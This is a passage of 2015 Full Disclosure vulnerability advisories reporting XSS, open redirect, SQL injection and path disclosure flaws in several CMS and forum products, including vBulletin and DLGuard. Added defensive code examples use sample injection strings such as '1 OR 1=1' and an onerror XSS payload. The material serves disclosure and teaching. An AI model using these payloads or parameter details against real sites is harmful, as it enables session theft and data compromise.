http://tetraph.com/security/xss-vulnerability/comsenz-supesite-cms-reflected-xss-cross-site-scripting-security-vulnerabilities/
http://securityrelated.blogspot.com/2015/02/comsenz-supesite-cms-reflected-xss.html
http://www.inzeed.com/kaleidoscope/computer-security/comsenz-supesite-cms-reflected-xss-cross-site-scripting-security-vulnerabilities/
http://diebiyi.com/articles/%E5%AE%89%E5%85%A8/comsenz-supesite-cms-reflected-xss-cross-site-scripting-security-vulnerabilities/
https://itinfotechnology.wordpress.com/2015/02/25/comsenz-supesite-cms-reflected-xss-cross-site-scripting-security-vulnerabilities/
http://lists.kde.org/?a=139222176300014&r=1&w=3






--
Wang Jing,
Division of Mathematical Sciences (MAS),
School of Physical and Mathematical Sciences (SPMS),
Nanyang Technological University (NTU),
Singapore.
http://www.tetraph.com/wangjing/
https://plus.google.com/u/0/+JingWang-tetraph-justqdjing/posts



[FD] NetCat CMS Multiple URL Redirection (Open Redirect) Security Vulnerabilities

2015-03-01 Thread Jing Wang
*NetCat CMS Multiple URL Redirection (Open Redirect) Security
Vulnerabilities*



Exploit Title: NetCat CMS Multiple URL Redirection Security Vulnerabilities
Product: NetCat CMS (Content Management System)
Vendor: NetCat
Vulnerable Versions: 5.01   3.12   3.0   2.4   2.3   2.2   2.1   2.0   1.1
Tested Version: 3.12
Advisory Publication: Feb 25, 2015
Latest Update: Feb 25, 2015
Vulnerability Type: URL Redirection to Untrusted Site ('Open Redirect')
[CWE-601]
CVE Reference: *
Credit: Wang Jing [CCRG, Nanyang Technological University (NTU), Singapore]







*Advisory Details:*


*(1) Vendor & Product Description:*


*Vendor:*
NetCat


*Product & Version:*
NetCat
5.01   3.12   3.0   2.4   2.3   2.2   2.1   2.0   1.1


*Vendor URL & Download:*
NetCat can be downloaded from here,
http://netcat.ru/


*Product Introduction:*
NetCat.ru is a Russian local company. NetCat is designed to create the
absolute majority of site types: from a simple business card with minimal
content to complex web-based systems, from corporate offices to online
stores, libraries or media data - in other words, projects of completely
different directions and at any level of complexity. Examples of sites
running on NetCat CMS can be viewed in a special section.

Even an inexperienced user can manage a site based on NetCat, because it
does not require knowledge of Internet technologies, programming or markup
languages. NetCat is constantly improving and adds new features. In the
process of finalizing, the wishes of our partners and clients, as well as
trends in Internet development, are necessarily taken into account. More
than 2,000 studios and private web developers have chosen NetCat for their
projects, and in 2013 more than 18,000 sites were created that successfully
work on our CMS.





*(2) Vulnerability Details:*
NetCat has a security bug problem. It can be exploited by URL Redirection
(Open Redirect) attacks.

*(2.1)* The first vulnerability occurs at modules/redir/? page with
site parameter.

*(2.2)* The second vulnerability occurs at redirect.php? page with url
parameter.

*(2.3)* The third vulnerability occurs at netshop/post.php page with
redirect_url parameter.







*References:*
http://tetraph.com/security/open-redirect/netcat-cms-multiple-url-redirection-open-redirect-security-vulnerabilities/
http://securityrelated.blogspot.com/2015/02/netcat-cms-multiple-url-redirection.html
http://www.inzeed.com/kaleidoscope/computer-security/netcat-cms-multiple-url-redirection-open-redirect-security-vulnerabilities/
http://diebiyi.com/articles/%E5%AE%89%E5%85%A8/netcat-cms-multiple-url-redirection-open-redirect-security-vulnerabilities/
https://itinfotechnology.wordpress.com/2015/02/25/netcat-cms-multiple-url-redirection-open-redirect-security-vulnerabilities/
http://lists.kde.org/?a=139222176300014&r=1&w=2






--
Wang Jing,
Division of Mathematical Sciences (MAS),
School of Physical and Mathematical Sciences (SPMS),
Nanyang Technological University (NTU),
Singapore.
http://www.tetraph.com/wangjing/
https://plus.google.com/u/0/+JingWang-tetraph-justqdjing/posts


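The three NetCat parameters named above (site, url, redirect_url) fail the same way: their value becomes a Location header unchecked, so a link on the trusted domain can send a visitor anywhere. The block below is an added example, not NetCat's code; the allowed host names and the default target are assumptions. It accepts only site-relative paths or https URLs on an explicit host list and rebuilds the URL from parsed parts so that userinfo, fragments and non-http schemes never survive.

```python
"""Allow-list validation of a redirect target taken from a request
parameter. Added example for the NetCat open-redirect report above; not
NetCat's code. ALLOWED_HOSTS and DEFAULT_TARGET are assumptions.
"""
from urllib.parse import urlsplit, urlunsplit

# Hypothetical hosts this deployment may send users to.
ALLOWED_HOSTS = frozenset({"shop.example.com", "www.example.com"})
DEFAULT_TARGET = "/"


def safe_redirect_target(raw, allowed_hosts=ALLOWED_HOSTS, default=DEFAULT_TARGET):
    """Return a redirect target that is either a site-relative path or an
    https URL on an allowed host; anything else yields ``default``."""
    if raw is None:
        return default
    target = raw.strip()
    if not target:
        return default
    # Backslashes and control characters are rejected outright: browsers
    # treat "/\evil" like "//evil", and CR/LF would split the header.
    if "\\" in target or any(ord(ch) < 0x20 for ch in target):
        return default

    parts = urlsplit(target)
    if parts.scheme and parts.scheme.lower() not in ("http", "https"):
        return default                      # javascript:, data:, ...
    if parts.netloc:
        host = (parts.hostname or "").lower()
        if host not in allowed_hosts:
            return default                  # also catches "allowed@evil" forms
        try:
            port = parts.port                # raises ValueError on "host:abc"
        except ValueError:
            return default
        netloc = host if port is None else f"{host}:{port}"
        # Rebuild from parsed pieces so no userinfo or fragment survives.
        return urlunsplit(("https", netloc, parts.path or "/", parts.query, ""))
    # No host part: accept only a single-slash path (not "//host" or "///host").
    if not target.startswith("/") or target.startswith("//"):
        return default
    return urlunsplit(("", "", parts.path, parts.query, ""))


if __name__ == "__main__":
    for candidate in ("/account?tab=orders", "//evil.example/",
                      "http://shop.example.com/cart", "javascript:alert(1)",
                      "https://shop.example.com@evil.example.com/"):
        print(f"{candidate!r:48} -> {safe_redirect_target(candidate)!r}")
```

Returning a fixed default rather than an error keeps the redirect endpoint usable for legitimate flows while giving the caller nothing to tune; if the application needs to record rejections, log them at the point where `default` is returned.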

[FD] CVE-2014-9468 InstantASP InstantForum.NET Multiple XSS (Cross-Site Scripting) Security Vulnerabilities

2015-02-18 Thread Jing Wang
*CVE-2014-9468 InstantASP InstantForum.NET Multiple XSS (Cross-Site
Scripting) Security Vulnerabilities*



Exploit Title: InstantASP InstantForum.NET Multiple XSS (Cross-Site
Scripting) Security Vulnerabilities
Product: InstantForum.NET
Vendor: InstantASP
Vulnerable Versions: v4.1.3   v4.1.1   v4.1.2   v4.0.0   v4.1.0   v3.4.0
Tested Version: v4.1.3   v4.1.1   v4.1.2
Advisory Publication: Feb 18, 2015
Latest Update: Feb 18, 2015
Vulnerability Type: Cross-Site Scripting [CWE-79]
CVE Reference: CVE-2014-9468
CVSS Severity (version 2.0):
CVSS v2 Base Score: 4.3 (MEDIUM) (AV:N/AC:M/Au:N/C:N/I:P/A:N) (legend)
Impact Subscore: 2.9
Exploitability Subscore: 8.6
Credit: Wang Jing [Mathematics, Nanyang Technological University, Singapore]







*Advisory Details:*


*(1) Vendor & Product Description:*


*Vendor:*
InstantASP


*Product & Version:*
InstantForum.NET
v4.1.3 v4.1.1 v4.1.2 v4.0.0 v4.1.0 v3.4.0


*Vendor URL & Download:*
InstantForum.NET can be downloaded from here,
http://docs.instantasp.co.uk/InstantForum/default.html?page=v413tov414guide.html


*Product Introduction:*
“InstantForum.NET is a feature rich, ultra high performance ASP.NET & SQL
Server discussion forum solution designed to meet the needs of the most
demanding online communities or internal collaboration environments. Now in
the fourth generation, InstantForum.NET has been completely rewritten from
the ground-up over several months to introduce some truly unique features &
performance enhancements.

The new administrator control panel now offers the most comprehensive
control panel available for any ASP.NET based forum today. Advanced
security features such as role based permissions and our unique Permission
Sets feature provides unparalleled configurable control over the content
and features that are available to your users within the forum. Moderators
can easily be assigned to specific forums with dedicated moderator
privileges for each forum. Bulk moderation options ensure even the busiest
forums can be managed effectively by your moderators.

The forums template driven skinning architecture offers complete
customization support. Each skin can be customized to support a completely
unique layout or visual appearance. A single central style sheet controls
every aspect of a skin's appearance. The use of unique HTML wrappers and
ASP.NET 1.1 master pages ensures page designers can easily integrate an
existing design around the forum. Skins, wrappers & master page templates
can be applied globally to all forums or to any specific forum.





*(2) Vulnerability Details:*
InstantForum.NET has a security problem. It can be exploited by XSS attacks.


*(2.1)* The first vulnerability occurs at the “Join.aspx” page with its
SessionID parameter.

*(2.2)* The second vulnerability occurs at the “Logon.aspx” page with its
SessionID parameter.









*References:*
http://tetraph.com/security/cves/cve-2014-9468-instantasp-instantforum-net-multiple-xss-cross-site-scripting-security-vulnerabilities/
http://securityrelated.blogspot.com/2015/02/cve-2014-9468-instantasp.html
https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-9468
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-9468
https://security-tracker.debian.org/tracker/CVE-2014-9468
http://www.cvedetails.com/cve/CVE-2014-9468/
http://www.security-database.com/detail.php?alert=CVE-2014-9468
http://packetstormsecurity.com/files/cve/CVE-2014-9468
http://www.pentest.it/cve-2014-9468.html
http://www.naked-security.com/cve/CVE-2014-9468/
http://www.inzeed.com/kaleidoscope/cves/cve-2014-9468/
http://007software.net/cve-2014-9468/
http://diebiyi.com/articles/%E5%AE%89%E5%85%A8/cve-2014-9468/
https://vulnerabilitypost.wordpress.com/2015/02/18/cve-2014-9468/








--
Wang Jing,
Division of Mathematical Sciences (MAS),
School of Physical and Mathematical Sciences (SPMS),
Nanyang Technological University (NTU),
Singapore.
http://www.tetraph.com/wangjing/
https://twitter.com/justqdjing


[FD] DLGuard Multiple XSS (Cross-Site Scripting) Security Vulnerabilities

2015-02-18 Thread Jing Wang
*DLGuard Multiple XSS (Cross-Site Scripting) Security Vulnerabilities*



Exploit Title: DLGuard Multiple XSS (Cross-Site Scripting) Security
Vulnerabilities

Product: DLGuard

Vendor: DLGuard

Vulnerable Versions: v5   v4.6   v4.5

Tested Version: v5   v4.6

Advisory Publication: Feb 18, 2015

Latest Update: Feb 18, 2015

Vulnerability Type: Cross-Site Scripting [CWE-79]

CVE Reference: *

Credit: Wang Jing [Mathematics, Nanyang Technological University, Singapore]







*Advisory Details:*




*(1) Vendor & Product Description:*



*Vendor:*
DLGuard



*Product & Version:*
DLGuard
v5   v4.6   v4.5



*Vendor URL & Download:*
DLGuard can be downloaded from here,

http://www.dlguard.com/dlginfo/index.php



*Product Introduction:*
“DLGuard is a powerful, yet easy to use script that you simply upload to
your website and then rest assured that your internet business is not only
safe, but also much easier to manage, automating the tasks you just don't
have the time for.

DLGuard supports the three types, or methods, of sale on the internet:

1. Single item sales (including bonus products!)
2. Multiple item sales
3. Membership websites





*(2) Vulnerability Details:*
DLGuard has a security problem. It can be exploited by XSS attacks.


*(2.1)* The first vulnerability occurs at the “index.php” page with its
page, c and redirect parameters.

*(2.2)* The second vulnerability occurs at main page's search field with
searchTerm parameter in HTTP POST.








*References:*
http://tetraph.com/security/xss-vulnerability/dlguard-multiple-xss-cross-site-scripting-security-vulnerabilities/
http://securityrelated.blogspot.com/2015/02/dlguard-multiple-xss-cross-site.html








--
Wang Jing,
Division of Mathematical Sciences (MAS),
School of Physical and Mathematical Sciences (SPMS),
Nanyang Technological University (NTU),
Singapore.
http://www.tetraph.com/wangjing/
https://twitter.com/justqdjing


[FD] DLGuard Full Path Disclosure (Information Leakage) Security Vulnerabilities

2015-02-18 Thread Jing Wang
*DLGuard Full Path Disclosure (Information Leakage) Security
Vulnerabilities*



Exploit Title: DLGuard /index.php c parameter Full Path Disclosure Security
Vulnerabilities
Product: DLGuard
Vendor: DLGuard
Vulnerable Versions: v4.5
Tested Version: v4.5
Advisory Publication: Feb 18, 2015
Latest Update: Feb 18, 2015
Vulnerability Type: Information Exposure [CWE-200]
CVE Reference: *
Credit: Wang Jing [Mathematics, Nanyang Technological University, Singapore]







*Advisory Details:*


*(1) Vendor & Product Description:*


*Vendor:*
DLGuard


*Product & Version:*
DLGuard
v4.5


*Vendor URL & Download:*
DLGuard can be downloaded from here,
http://www.dlguard.com/dlginfo/index.php


*Product Introduction:*
“DLGuard is a powerful, yet easy to use script that you simply upload to
your website and then rest assured that your internet business is not only
safe, but also much easier to manage, automating the tasks you just don't
have the time for.


DLGuard supports the three types, or methods, of sale on the internet:
1. Single item sales (including bonus products!)
2. Multiple item sales
3. Membership websites





*(2) Vulnerability Details:*
DLGuard has a security problem. It can be exploited by Full Path Disclosure
attacks.


*(2.1)* The first vulnerability occurs at the “index.php” page with its c
parameter.






*References:*
http://tetraph.com/security/full-path-disclosure-vulnerability/dlguard-full-path-disclosure-information-leakage-security-vulnerabilities/
http://securityrelated.blogspot.com/2015/02/dlguard-full-path-disclosure.html







--
Wang Jing,
Division of Mathematical Sciences (MAS),
School of Physical and Mathematical Sciences (SPMS),
Nanyang Technological University (NTU),
Singapore.
http://www.tetraph.com/wangjing/
https://twitter.com/justqdjing


[FD] DLGuard SQL Injection Security Vulnerabilities

2015-02-18 Thread Jing Wang
DLGuard SQL Injection Security Vulnerabilities


Exploit Title: DLGuard /index.php c parameter SQL Injection Security
Vulnerabilities
Product: DLGuard
Vendor: DLGuard
Vulnerable Versions: v4.5
Tested Version: v4.5
Advisory Publication: Feb 18, 2015
Latest Update: Feb 18, 2015
Vulnerability Type: Improper Neutralization of Special Elements used in an
SQL Command (‘SQL Injection’) (CWE-89)
CVE Reference: *
Credit: Wang Jing [Mathematics, Nanyang Technological University, Singapore]







*Advisory Details:*


*(1) Vendor & Product Description:*


*Vendor:*
DLGuard


*Product & Version:*
DLGuard
v4.5


*Vendor URL & Download:*
DLGuard can be downloaded from here,
http://www.dlguard.com/dlginfo/index.php


*Product Introduction:*
“DLGuard is a powerful, yet easy to use script that you simply upload to
your website and then rest assured that your internet business is not only
safe, but also much easier to manage, automating the tasks you just don't
have the time for.

DLGuard supports the three types, or methods, of sale on the internet:
1. Single item sales (including bonus products!)
2. Multiple item sales
3. Membership websites





*(2) Vulnerability Details:*
DLGuard has a security problem. It can be exploited by SQL Injection
attacks.


*(2.1)* The first vulnerability occurs at the “index.php” page with its c
parameter.







*References:*
http://tetraph.com/security/sql-injection-vulnerability/dlguard-sql-injection-security-vulnerabilities/
http://securityrelated.blogspot.com/2015/02/dlguard-sql-injection-security.html





--
Wang Jing,
Division of Mathematical Sciences (MAS),
School of Physical and Mathematical Sciences (SPMS),
Nanyang Technological University (NTU),
Singapore.
http://www.tetraph.com/wangjing/
https://twitter.com/justqdjing


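Two of the DLGuard reports above concern the same index.php c parameter: one where it reaches an SQL statement unescaped, and one where a malformed value produces an error page that prints the server's file-system path. The block below is an added example, not DLGuard's code; the table, rows and response shapes are assumptions. It places the flawed concatenation beside a bound-parameter query, and wraps the lookup in a handler that validates the value first, logs failures in full server-side, and returns only a generic message to the client.

```python
"""Parameterized lookup and error handling for an index.php?c= style
parameter. Added example for the DLGuard SQL injection and full path
disclosure reports above; not DLGuard's code. The schema and sample rows
are constructed for the demo.
"""
import logging
import sqlite3
from typing import List, Tuple, Union

log = logging.getLogger("shop")


def make_demo_db() -> sqlite3.Connection:
    """In-memory catalogue with constructed sample rows."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE products (id INTEGER PRIMARY KEY, name TEXT, public INTEGER)")
    conn.executemany("INSERT INTO products VALUES (?, ?, ?)",
                     [(1, "ebook", 1), (2, "video course", 1), (3, "unreleased", 0)])
    return conn


def lookup_vulnerable(conn: sqlite3.Connection, c: str) -> List[Tuple]:
    """The flawed pattern: the request value is spliced into the SQL text,
    so 'OR 1=1' style input rewrites the WHERE clause."""
    sql = f"SELECT id, name FROM products WHERE public = 1 AND id = {c}"
    return conn.execute(sql).fetchall()


def lookup_safe(conn: sqlite3.Connection, c: Union[int, str]) -> List[Tuple]:
    """Bound parameter: the value is compared as data, never parsed as SQL."""
    return conn.execute(
        "SELECT id, name FROM products WHERE public = 1 AND id = ?", (c,)
    ).fetchall()


def handle_request(conn: sqlite3.Connection, c: str) -> dict:
    """Request handler that never leaks internals to the client."""
    try:
        product_id = int(c)
        if product_id <= 0:
            raise ValueError("id must be positive")
    except (TypeError, ValueError):
        # Rejected before touching the database. The reply does not echo the
        # raw value, which would only reintroduce a reflection problem.
        return {"status": 400, "body": "Invalid product reference."}
    try:
        rows = lookup_safe(conn, product_id)
    except sqlite3.Error:
        # Full detail, traceback and paths included, stays in the server log.
        log.exception("product lookup failed for id=%d", product_id)
        return {"status": 500, "body": "Temporary error, please retry."}
    if not rows:
        return {"status": 404, "body": "Product not found."}
    return {"status": 200, "body": {"id": rows[0][0], "name": rows[0][1]}}


if __name__ == "__main__":
    db = make_demo_db()
    print("concatenated :", lookup_vulnerable(db, "1 OR 1=1"))
    print("parameterized:", lookup_safe(db, "1 OR 1=1"))
    for value in ("2", "1 OR 1=1", "3", "-5"):
        print(f"c={value!r:12} -> {handle_request(db, value)}")
```

The same split applies to a PHP code base: prepared statements (PDO or mysqli) for the query, and `display_errors=Off` with exceptions caught at the handler boundary so that a bad `c` never renders a PHP warning containing the script's absolute path.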
[FD] CVE-2014-8753 Cit-e-Net Multiple XSS (Cross-Site Scripting) Security Vulnerabilities

2015-02-12 Thread Jing Wang
*CVE-2014-8753  Cit-e-Net Multiple XSS (Cross-Site Scripting) Security
Vulnerabilities*


Exploit Title: Cit-e-Net Multiple XSS (Cross-Site Scripting) Security
Vulnerabilities
Product: Cit-e-Access
Vendor: Cit-e-Net
Vulnerable Versions: Version 6
Tested Version: Version 6
Advisory Publication: Feb 12, 2015
Latest Update: Feb 12, 2015
Vulnerability Type: Cross-Site Scripting [CWE-79]
CVE Reference: CVE-2014-8753
CVSS Severity (version 2.0):
CVSS v2 Base Score: 4.3 (MEDIUM) (AV:N/AC:M/Au:N/C:N/I:P/A:N) (legend)
Impact Subscore: 2.9
Exploitability Subscore: 8.6
Credit: Wang Jing [Mathematics, Nanyang Technological University, Singapore]





*Advisory Details:*
*(1) Vendor & Product Description:*

*Vendor:*
Cit-e-Net

*Product & Version:*
Cit-e-Access
Version 6

*Vendor URL & Download:*
Cit-e-Net can be downloaded from here,
https://www.cit-e.net/citeadmin/help/cntrainingmanualhowto.pdf
http://demo.cit-e.net/
http://www.cit-e.net/demorequest.cfm
http://demo.cit-e.net/Cit-e-Access/ServReq/?TID=1&TPID=17

*Product Introduction:*
We are a premier provider of Internet-based solutions encompassing web
site development and modular interactive e-government applications which
bring local government, residents and community businesses together.

Cit-e-Net provides a suite of on-line interactive services to counties,
municipalities, and other government agencies, that they in turn can offer
to their constituents. The municipal government achieves a greater degree
of efficiency and timeliness in conducting the daily operations of
government, while residents receive improved and easier access to city hall
through the on-line access to government services.




*(2) Vulnerability Details:*
Cit-e-Access has a security problem. It can be exploited by XSS attacks.

*(2.1)* The first vulnerability occurs at /eventscalendar/index.cfm? page
with DID parameter in HTTP GET.

*(2.2)* The second vulnerability occurs at /search/index.cfm? page with
keyword parameter in HTTP POST.

*(2.3)* The third vulnerability occurs at /news/index.cfm page with
jump2 DID parameter in HTTP GET.

*(2.4)* The fourth vulnerability occurs at eventscalendar? page with
TPID parameter in HTTP GET.

*(2.5) *The fifth vulnerability occurs at /meetings/index.cfm? page with
DID parameter in HTTP GET.




*(3) Solutions:*
Message left with the vendor. No response.
http://www.cit-e.net/contact.cfm









*References:*
http://tetraph.com/security/cves/cve-2014-8753-cit-e-net-multiple-xss-cross-site-scripting-security-vulnerabilities/
http://securityrelated.blogspot.com/2015/02/cve-2014-8753-cit-e-net-multiple-xss.html
https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-8753
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-8753
https://security-tracker.debian.org/tracker/CVE-2014-8753
http://www.cvedetails.com/cve/CVE-2014-8753/
http://www.security-database.com/detail.php?alert=CVE-2014-8753
http://packetstormsecurity.com/files/cve/CVE-2014-8753
http://www.inzeed.com/kaleidoscope/cves/cve-2014-8753/
http://www.pentest.it/cve-2014-8753.html
http://www.naked-security.com/cve/CVE-2014-8753/
http://diebiyi.com/articles/%E5%AE%89%E5%85%A8/cve-2014-8753/
http://007software.net/cve-2014-8753/
https://itinfotechnology.wordpress.com/2015/02/12/cve-2014-8753/


--
Wang Jing,
Division of Mathematical Sciences (MAS),
School of Physical and Mathematical Sciences (SPMS),
Nanyang Technological University (NTU),
Singapore.
http://www.tetraph.com/wangjing/
https://twitter.com/justqdjing

___
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/


[FD] CVE-2014-9469 vBulletin XSS (Cross-Site Scripting) Security Vulnerabilities

2015-02-12 Thread Jing Wang
*CVE-2014-9469  vBulletin XSS (Cross-Site Scripting) Security
Vulnerabilities*


Exploit Title: vBulletin XSS (Cross-Site Scripting) Security Vulnerabilities
Product: vBulletin Forum
Vendor: vBulletin
Vulnerable Versions: 5.1.3, 5.0.5, 4.2.2, 3.8.7, 3.6.7, 3.6.0, 3.5.4
Tested Version: 5.1.3, 4.2.2
Advisory Publication: Feb 12, 2015
Latest Update: Feb 12, 2015
Vulnerability Type: Cross-Site Scripting [CWE-79]
CVE Reference: CVE-2014-9469
CVSS Severity (version 2.0):
CVSS v2 Base Score: 4.3 (MEDIUM) (AV:N/AC:M/Au:N/C:N/I:P/A:N)
Impact Subscore: 2.9
Exploitability Subscore: 8.6
Credit: Wang Jing [Mathematics, Nanyang Technological University, Singapore]


*Advisory Details:*

*(1) Vendor & Product Description:*

*Vendor:*
vBulletin


*Product & Version:*
vBulletin Forum
5.1.3, 5.0.5, 4.2.2, 3.8.7, 3.6.7, 3.6.0, 3.5.4


*Vendor URL & Download:*
vBulletin can be downloaded from here,
https://www.vbulletin.com/purchases/


*Product Introduction:*
vBulletin (vB) is a proprietary Internet forum software package developed
by vBulletin Solutions, Inc., a division of Internet Brands. It is written
in PHP and uses a MySQL database server.

Since the initial release of the vBulletin forum product in 2000, there
have been many changes and improvements. Below is a list of the major
revisions and some of the changes they introduced. The current production
versions are 3.8.7, 4.2.2 and 5.1.3.




*(2) Vulnerability Details:*
vBulletin has a security problem. It can be exploited by XSS attacks.

*(2.1)* The vulnerability occurs at the forum/help page. Add a hash symbol
first, then add the script after it.


*References:*
http://tetraph.com/security/cves/cve-2014-9469-vbulletin-xss-cross-site-scripting-security-vulnerabilities/
http://securityrelated.blogspot.com/2015/02/cve-2014-9469-vbulletin-xss-cross-site.html
https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-9469
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-9469
https://security-tracker.debian.org/tracker/CVE-2014-9469
http://www.cvedetails.com/cve/CVE-2014-9469/
http://www.security-database.com/detail.php?alert=CVE-2014-9469
http://packetstormsecurity.com/files/cve/CVE-2014-9469
http://www.pentest.it/cve-2014-9469.html
http://www.naked-security.com/cve/CVE-2014-9469/
http://www.inzeed.com/kaleidoscope/cves/cve-2014-9469/
http://007software.net/cve-2014-9469/
http://diebiyi.com/articles/%E5%AE%89%E5%85%A8/cve-2014-9469/
https://computertechhut.wordpress.com/2015/02/12/cve-2014-9469/


--
Wang Jing,
Division of Mathematical Sciences (MAS),
School of Physical and Mathematical Sciences (SPMS),
Nanyang Technological University (NTU),
Singapore.
http://www.tetraph.com/wangjing/
https://twitter.com/justqdjing


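The vBulletin report above says the help page becomes exploitable once a hash symbol is appended and a script follows it. That is the shape of a DOM-based XSS: the page's own JavaScript reads `location.hash` and writes it into the document as markup, and because the fragment is never sent to the server, no server-side filter or access log ever sees it. The block below is an added example, not vBulletin's code and not part of the original post. It models the vulnerable and the hardened handler as string-producing functions so it runs under Node without a browser; the function names, the anchor markup and the sample fragments are assumptions for illustration.

```javascript
// Added example, not vBulletin's code: the DOM-based XSS pattern behind
// "add a hash symbol, then a script". Function names, markup and sample
// fragments are assumptions for illustration.

// Vulnerable pattern: the fragment is concatenated straight into HTML that the
// page would later assign to element.innerHTML. A <script> tag inserted via
// innerHTML does not execute, so real payloads use an event handler such as
// <img src=x onerror=...>, which does.
function helpAnchorVulnerable(hash) {
  const topic = hash.startsWith('#') ? hash.slice(1) : hash;
  return '<a href="#' + topic + '">' + topic + '</a>';
}

// Browsers may hand the fragment back percent-encoded (%3C for "<"), and page
// code often decodes it before use, so validate the decoded form.
// Returns null for malformed percent-encoding.
function decodeFragment(hash) {
  const raw = hash.startsWith('#') ? hash.slice(1) : hash;
  try {
    return decodeURIComponent(raw);
  } catch (_) {
    return null;
  }
}

// Escape the five characters that can change context inside an HTML text node
// or a double-quoted attribute value.
function escapeHtml(s) {
  const map = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;' };
  return String(s).replace(/[&<>"']/g, (c) => map[c]);
}

// Hardened pattern: constrain the fragment to the token shape the help page
// actually expects (an anchor id), then escape it for the output context.
// Returning null tells the caller to fall back to the default view.
const TOPIC_ID = /^[A-Za-z0-9_-]{1,64}$/;
function helpAnchorSafe(hash) {
  const topic = decodeFragment(hash);
  if (topic === null || !TOPIC_ID.test(topic)) return null;
  const t = escapeHtml(topic); // no-op after the allow-list; kept as defence in depth
  return '<a href="#' + t + '">' + t + '</a>';
}

// Constructed sample fragments of the kind the advisory describes.
const PAYLOAD = '#<img src=x onerror=alert(1)>';
const PAYLOAD_ENCODED = '#%3Cimg%20src%3Dx%20onerror%3Dalert(1)%3E';

function demo() {
  return {
    vulnerable: helpAnchorVulnerable(PAYLOAD),
    safe: helpAnchorSafe(PAYLOAD),
    safeEncoded: helpAnchorSafe(PAYLOAD_ENCODED),
    benign: helpAnchorSafe('#faq_posting'),
  };
}
```

Running `demo()` shows the vulnerable function reflecting the `<img ... onerror=...>` markup verbatim while the hardened one rejects both the raw and the percent-encoded fragment and renders only the benign anchor id. The allow-list does the real work here; output escaping alone would still let an attacker pick any anchor text, and `encodeURIComponent` is the wrong tool because it encodes for URLs, not for HTML.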

[FD] CVE-2014-9562 OptimalSite Content Management System (CMS) XSS (Cross-Site Scripting) Security Vulnerabilities

2015-02-02 Thread Jing Wang
*CVE-2014-9562 OptimalSite Content Management System (CMS) XSS (Cross-Site
Scripting) Security Vulnerabilities*


Exploit Title:  OptimalSite CMS /display_dialog.php image Parameter XSS
Security Vulnerability
Vendor: OptimalSite
Product: OptimalSite Content Management System (CMS)
Vulnerable Versions: V.1, V2.4
Tested Version: V.1, V2.4
Advisory Publication: Feb 2, 2015
Latest Update: Feb 2, 2015
Vulnerability Type: Cross-Site Scripting [CWE-79]
CVE Reference: CVE-2014-9562
CVSS Severity (version 2.0):
CVSS v2 Base Score: 4.3 (MEDIUM) (AV:N/AC:M/Au:N/C:N/I:P/A:N)
Impact Subscore: 2.9
Exploitability Subscore: 8.6
Credit: Wang Jing [Mathematics, Nanyang Technological University (NTU),
Singapore]


*Advisory Details:*

*(1) Vendor & Product Description*

*Vendor:*
OptimalSite


*Product & Version:*
OptimalSite Content Management System (CMS)
V.1
V2.4


*Vendor URL & Download:*
http://www.optimalsite.com/en/



*Product Description:*
“Content management system OptimalSite is an online software package that
enables the management of information published on a website.”

“OptimalSite consists of the system core and integrated modules, which
allow expanding website possibilities and functionality. You may select a
set of modules that suits your needs best.”





*(2) Vulnerability Details:*
OptimalSite Content Management System (CMS) has a security problem. It can
be exploited by XSS attacks.

*(2.1) *The vulnerability occurs at “display_dialog.php” page with “image”
parameter.


*References:*
http://tetraph.com/security/cves/cve-2014-9562-optimalsite-content-management-system-cms-xss-cross-site-scripting-security-vulnerabilities/
http://securityrelated.blogspot.com/2015/02/cve-2014-9562-optimalsite-content.html
https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-9562
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-9562
https://security-tracker.debian.org/tracker/CVE-2014-9562
http://www.cvedetails.com/cve/CVE-2014-9562/
http://www.security-database.com/detail.php?alert=CVE-2014-9562
http://packetstormsecurity.com/files/cve/CVE-2014-9562
http://www.pentest.it/cve-2014-9562.html
http://www.naked-security.com/cve/CVE-2014-9562/
http://007software.net/cve-2014-9562/


--
Wang Jing,
Division of Mathematical Sciences (MAS),
School of Physical and Mathematical Sciences (SPMS),
Nanyang Technological University (NTU),
Singapore.
http://www.tetraph.com/wangjing/


[FD] About Group (about.com) All Topics (At least 99.88% links) Vulnerable to XSS Iframe Injection Security Attacks, About.com Open Redirect Security Vulnerabilities

2015-02-02 Thread Jing Wang
*About Group (about.com) All Topics (At least 99.88% links) Vulnerable to
XSS & Iframe Injection Security Attacks, About.com Open Redirect Security
Vulnerabilities*


*Vulnerability Description:*
All of About.com's topic sites are vulnerable to XSS (Cross-Site Scripting)
and Iframe Injection (Cross-Frame Scripting) attacks. This means all
sub-domains of about.com are affected. Using a self-written program, 94,357
links were tested. Only 118 links do not belong to the topic (Metasite)
links. Meanwhile, some about.com main pages are vulnerable to XSS attacks,
too. This means no more than 0.125% of links are unaffected: at least
99.875% of About Group's links are vulnerable to XSS and Iframe Injection
attacks. In fact, in about.com's structure the main domain is little more
than a cover, so very few links belong to it.

At the same time, the About.com main page's search field is vulnerable to
XSS attacks, too. This means all domains related to about.com are
vulnerable to XSS attacks.

The Iframe Injection vulnerabilities can also be used to mount DoS
(Denial-of-Service) attacks against other websites.

Finally, some Open Redirect vulnerabilities related to about.com are
described. There may be a large number of other Open Redirect
vulnerabilities that were not detected. Since About.com is trusted by some
other websites, those vulnerabilities can be used to perform Covert
Redirect attacks against these websites.


*Vulnerability Disclosure:*
Those vulnerabilities were reported to About on Sunday, Oct 19, 2014. No
one replied. As of now, they remain unpatched.


*Vulnerability Discoverer:*
Wang Jing, Division of Mathematical Sciences (MAS), School of Physical and
Mathematical Sciences (SPMS), Nanyang Technological University (NTU),
Singapore.
http://www.tetraph.com/wangjing


*(1) Some Basic Background*

*(1.1) Domain Description:*
http://www.about.com/

For March 2014, 61,428,000 unique visitors were registered by comScore for
About.com, making it the 16th-most-visited online property for that month.
(The New York Times)

About.com, also known as The About Group (formerly About Inc.), is an
Internet-based network of content that publishes articles and videos about
